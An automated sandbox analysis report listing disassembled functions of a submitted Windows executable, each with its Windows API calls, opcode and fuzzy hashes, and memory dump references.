                                                                  • Opcode ID: 57a30e1750555447bb863beee5d6c223b92ebc1252cdbd3655e742a921fd0ba9
                                                                  • Instruction ID: 96be6d22fe855632a4c97fb5e99379f01778b73fdf00b63f1124e888ccf42198
                                                                  • Opcode Fuzzy Hash: 57a30e1750555447bb863beee5d6c223b92ebc1252cdbd3655e742a921fd0ba9
                                                                  • Instruction Fuzzy Hash: 82315530900308AEFF30CB66C814BFEBBBAABC6312F04475AE8C4661D1C33899999751
                                                                  Function 009261C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009261FB
                                                                  • __isleadbyte_l.LIBCMT ref: 00926229
                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00926257
                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0092628D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                  • String ID:
                                                                  • API String ID: 3058430110-0
                                                                  • Opcode ID: dcc60d99876ef74debb3cace7dfe77a6db86122f7cd88d8c70ebf427c39198d3
                                                                  • Instruction ID: c9f0244f04226156e87ef253b915d0cbd5638d259e670ed1bf9237699594591d
                                                                  • Opcode Fuzzy Hash: dcc60d99876ef74debb3cace7dfe77a6db86122f7cd88d8c70ebf427c39198d3
                                                                  • Instruction Fuzzy Hash: 3A31D231608266EFDF218F64EC44BAA7FB9FF41310F154428E864D7595D730E990DB90
                                                                  Function 00974EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetForegroundWindow.USER32 ref: 00974F02
                                                                    • Part of subcall function 00953641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0095365B
                                                                    • Part of subcall function 00953641: GetCurrentThreadId.KERNEL32 ref: 00953662
                                                                    • Part of subcall function 00953641: AttachThreadInput.USER32(00000000,?,00955005), ref: 00953669
                                                                  • GetCaretPos.USER32(?), ref: 00974F13
                                                                  • ClientToScreen.USER32(00000000,?), ref: 00974F4E
                                                                  • GetForegroundWindow.USER32 ref: 00974F54
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                  • String ID:
                                                                  • API String ID: 2759813231-0
                                                                  • Opcode ID: 561a0f4c5b9d1494723c34a16e3ede860ffb68c9388699aeb96a243f09705a78
                                                                  • Instruction ID: be603100806e52b362ad085913729c7dbca8318a696b042e642035e2c7d02a39
                                                                  • Opcode Fuzzy Hash: 561a0f4c5b9d1494723c34a16e3ede860ffb68c9388699aeb96a243f09705a78
                                                                  • Instruction Fuzzy Hash: 3A312D72D00108AFCB00EFB9C885AEFB7F9EF89300F10406AE555E7241DA719E458FA1
                                                                  Function 00953C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00953C7A
                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00953C88
                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00953CA8
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00953D52
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                  • String ID:
                                                                  • API String ID: 420147892-0
                                                                  • Opcode ID: 9c455d8ae16d258201c09eb68aaddfcd3fb392ffb74858b285be9cee4a75508a
                                                                  • Instruction ID: 4f664678f92df36ad7ec1e945e556682fe163b24dc6ca31ef2775bfff4d1583a
                                                                  • Opcode Fuzzy Hash: 9c455d8ae16d258201c09eb68aaddfcd3fb392ffb74858b285be9cee4a75508a
                                                                  • Instruction Fuzzy Hash: B8317E311083099BD304EF65D891ABABBF8FF99354F50082DF986C61A1EB719A49CB53
                                                                  Function 0097C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F2612: GetWindowLongW.USER32(?,000000EB), ref: 008F2623
                                                                  • GetCursorPos.USER32(?), ref: 0097C4D2
                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0092B9AB,?,?,?,?,?), ref: 0097C4E7
                                                                  • GetCursorPos.USER32(?), ref: 0097C534
                                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0092B9AB,?,?,?), ref: 0097C56E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                  • String ID:
                                                                  • API String ID: 2864067406-0
                                                                  • Opcode ID: 1e9d1ec3a6c748b8d54abe46973950f9f290ef4dd6180c975b678412526c6fe4
                                                                  • Instruction ID: 28cb41f6aa063532e9b5462e9170065b41c7bb4b7be760ef3575e774c602d233
                                                                  • Opcode Fuzzy Hash: 1e9d1ec3a6c748b8d54abe46973950f9f290ef4dd6180c975b678412526c6fe4
                                                                  • Instruction Fuzzy Hash: 1831B676604018EFCB15CF58D858EFA7BBAFB09310F448169F9099B261C732AD50EFA4
                                                                  Function 00948656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0094810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00948121
                                                                    • Part of subcall function 0094810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0094812B
                                                                    • Part of subcall function 0094810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0094813A
                                                                    • Part of subcall function 0094810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00948141
                                                                    • Part of subcall function 0094810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00948157
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009486A3
                                                                  • _memcmp.LIBCMT ref: 009486C6
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009486FC
                                                                  • HeapFree.KERNEL32(00000000), ref: 00948703
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                  • String ID:
                                                                  • API String ID: 1592001646-0
                                                                  • Opcode ID: aa6fde51a13824205336137d6967175d6ae3f2de5d1e8fb0f2137fe1602b177e
                                                                  • Instruction ID: 9ac6f79721a8d446ea7da3f04f7f2d6710fb92affe1cd2f6caf21a72c316bede
                                                                  • Opcode Fuzzy Hash: aa6fde51a13824205336137d6967175d6ae3f2de5d1e8fb0f2137fe1602b177e
                                                                  • Instruction Fuzzy Hash: 0621AC32E04109EFDB00DFA4C948FEEB7B9EF84304F164059E904AB240EB30AE45CBA4
                                                                  Function 0091098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __setmode.LIBCMT ref: 009109AE
                                                                    • Part of subcall function 008F5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00957896,?,?,00000000), ref: 008F5A2C
                                                                    • Part of subcall function 008F5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00957896,?,?,00000000,?,?), ref: 008F5A50
                                                                  • _fprintf.LIBCMT ref: 009109E5
                                                                  • OutputDebugStringW.KERNEL32(?), ref: 00945DBB
                                                                    • Part of subcall function 00914AAA: _flsall.LIBCMT ref: 00914AC3
                                                                  • __setmode.LIBCMT ref: 00910A1A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                  • String ID:
                                                                  • API String ID: 521402451-0
                                                                  • Opcode ID: 62ff9dc6abf44d6b39d30748098c8e1bf9de90ddcc545087b7da6a0edb9b3faa
                                                                  • Instruction ID: e8800ba181bdad75ef2328f8f9a6d322b12877445fd4adb3ccdbd5f4cd141f5a
                                                                  • Opcode Fuzzy Hash: 62ff9dc6abf44d6b39d30748098c8e1bf9de90ddcc545087b7da6a0edb9b3faa
                                                                  • Instruction Fuzzy Hash: D1112731B0460C6FD704B2B89C46AFE7B6CEFC9320F200165F209A7182EE715CD697A1
                                                                  Function 00961767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009617A3
                                                                    • Part of subcall function 0096182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0096184C
                                                                    • Part of subcall function 0096182D: InternetCloseHandle.WININET(00000000), ref: 009618E9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$CloseConnectHandleOpen
                                                                  • String ID:
                                                                  • API String ID: 1463438336-0
                                                                  • Opcode ID: 6f58e729a2698ec4548e50e0f33142e22b318c284173e21352f5fd5b506eae07
                                                                  • Instruction ID: 3a530e7383692027837b2a4ea130f840af58ca11e431c641fd9e8642d0f05c17
                                                                  • Opcode Fuzzy Hash: 6f58e729a2698ec4548e50e0f33142e22b318c284173e21352f5fd5b506eae07
                                                                  • Instruction Fuzzy Hash: D821F332204601BFEB169F60CC01FBABBEDFF88711F18442AFA1597650DB75D810A7A0
                                                                  Function 00953A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesW.KERNEL32(?,0097FAC0), ref: 00953A64
                                                                  • GetLastError.KERNEL32 ref: 00953A73
                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00953A82
                                                                  • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0097FAC0), ref: 00953ADF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectory$AttributesErrorFileLast
                                                                  • String ID:
                                                                  • API String ID: 2267087916-0
                                                                  • Opcode ID: 9f88545f5c333d8665a9e2de844fe3398b8bf66014b8aa4585b79448159c65cb
                                                                  • Instruction ID: a43256f6ab6a7cc96c5abeccf4eed7037742721e3e769fedb1070c0b0920043b
                                                                  • Opcode Fuzzy Hash: 9f88545f5c333d8665a9e2de844fe3398b8bf66014b8aa4585b79448159c65cb
                                                                  • Instruction Fuzzy Hash: 2021A3355082059F8700EF39C89186BBBE8FF553A5F108A2DF899D72A2D731DE49CB52
                                                                  Function 0094DCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0094F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0094DCD3,?,?,?,0094EAC6,00000000,000000EF,00000119,?,?), ref: 0094F0CB
                                                                    • Part of subcall function 0094F0BC: lstrcpyW.KERNEL32(00000000,?,?,0094DCD3,?,?,?,0094EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0094F0F1
                                                                    • Part of subcall function 0094F0BC: lstrcmpiW.KERNEL32(00000000,?,0094DCD3,?,?,?,0094EAC6,00000000,000000EF,00000119,?,?), ref: 0094F122
                                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0094EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0094DCEC
                                                                  • lstrcpyW.KERNEL32(00000000,?,?,0094EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0094DD12
                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,0094EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0094DD46
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                  • String ID: cdecl
                                                                  • API String ID: 4031866154-3896280584
                                                                  • Opcode ID: 4cc84242a2a311ba52dc4328cb541a14ab76677472196c39b09b3d6dbd99ce78
                                                                  • Instruction ID: d38b720ceac68f900ccb84359dc6cd56e9c1371727dbcebbc2fc75b92bb843da
                                                                  • Opcode Fuzzy Hash: 4cc84242a2a311ba52dc4328cb541a14ab76677472196c39b09b3d6dbd99ce78
                                                                  • Instruction Fuzzy Hash: 77118E3A205305EFCB259F74DC55E7A77A9FF86350B40802AE806CB2A0EB719891D791
                                                                  Function 009250E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _free.LIBCMT ref: 00925101
                                                                    • Part of subcall function 0091571C: __FF_MSGBANNER.LIBCMT ref: 00915733
                                                                    • Part of subcall function 0091571C: __NMSG_WRITE.LIBCMT ref: 0091573A
                                                                    • Part of subcall function 0091571C: RtlAllocateHeap.NTDLL(01380000,00000000,00000001,00000000,?,?,?,00910DD3,?), ref: 0091575F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap_free
                                                                  • String ID:
                                                                  • API String ID: 614378929-0
                                                                  • Opcode ID: ad7bb13a85fc1a8b12c79a6543fd50caf085a63387ce8d69bf0c8bc85b9ad8a1
                                                                  • Instruction ID: 227269eec80cd3c763243bd46728e4c9a3483c3c40cf92af08097385c876211b
                                                                  • Opcode Fuzzy Hash: ad7bb13a85fc1a8b12c79a6543fd50caf085a63387ce8d69bf0c8bc85b9ad8a1
                                                                  • Instruction Fuzzy Hash: EF110AB265CA29AFCF312F70FC457AE379C5F403A1B124929F908DA156DE34C890A790
                                                                  Function 00966369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00957896,?,?,00000000), ref: 008F5A2C
                                                                    • Part of subcall function 008F5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00957896,?,?,00000000,?,?), ref: 008F5A50
                                                                  • gethostbyname.WSOCK32(?,?,?), ref: 00966399
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 009663A4
                                                                  • _memmove.LIBCMT ref: 009663D1
                                                                  • inet_ntoa.WSOCK32(?), ref: 009663DC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                  • String ID:
                                                                  • API String ID: 1504782959-0
                                                                  • Opcode ID: 5191dfdedd3a2950bd8cc673e896c89aa4756980388937406ce34f94f4a32a37
                                                                  • Instruction ID: 3df71f5a6ff3e8c5d73505cb201ed4fcf399fc17052312940710c07fcdf41906
                                                                  • Opcode Fuzzy Hash: 5191dfdedd3a2950bd8cc673e896c89aa4756980388937406ce34f94f4a32a37
                                                                  • Instruction Fuzzy Hash: 96114C32500109AFCB04EBA8D956DFEBBB8FF48310B144065F60AE7261DB31AE14DB62
                                                                  Function 00948B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00948B61
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00948B73
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00948B89
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00948BA4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 3db7f1171ab505357b0148e77acb340bb9bbfa4854fed82a06826ec9dc835770
                                                                  • Instruction ID: a5ef8370088344105935f19bd46e5e3c9161dae38421451ffa79c56104d3e17b
                                                                  • Opcode Fuzzy Hash: 3db7f1171ab505357b0148e77acb340bb9bbfa4854fed82a06826ec9dc835770
                                                                  • Instruction Fuzzy Hash: A5115E79900218FFDB10DF95CC84FAEBB78FB48710F2040A5E900B7250DA716E10DB94
                                                                  Function 008F1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F2612: GetWindowLongW.USER32(?,000000EB), ref: 008F2623
                                                                  • DefDlgProcW.USER32(?,00000020,?), ref: 008F12D8
                                                                  • GetClientRect.USER32(?,?), ref: 0092B5FB
                                                                  • GetCursorPos.USER32(?), ref: 0092B605
                                                                  • ScreenToClient.USER32(?,?), ref: 0092B610
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 4127811313-0
                                                                  • Opcode ID: b5d6629962b0fa7492cac7e2cdfb3444a215f048d542d0e19603d68343c747db
                                                                  • Instruction ID: ecfa41ce4bf7681a880afff197b9d6c13b7592ff9978fbe319ffefe87156d09a
                                                                  • Opcode Fuzzy Hash: b5d6629962b0fa7492cac7e2cdfb3444a215f048d542d0e19603d68343c747db
                                                                  • Instruction Fuzzy Hash: BD112536A1411DEFCF10EFA8D8899FE77B8FB05310F400456FA05E7240C730AA919BA6
                                                                  Function 00951142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0094FCED,?,00950D40,?,00008000), ref: 0095115F
                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0094FCED,?,00950D40,?,00008000), ref: 00951184
                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0094FCED,?,00950D40,?,00008000), ref: 0095118E
                                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,0094FCED,?,00950D40,?,00008000), ref: 009511C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
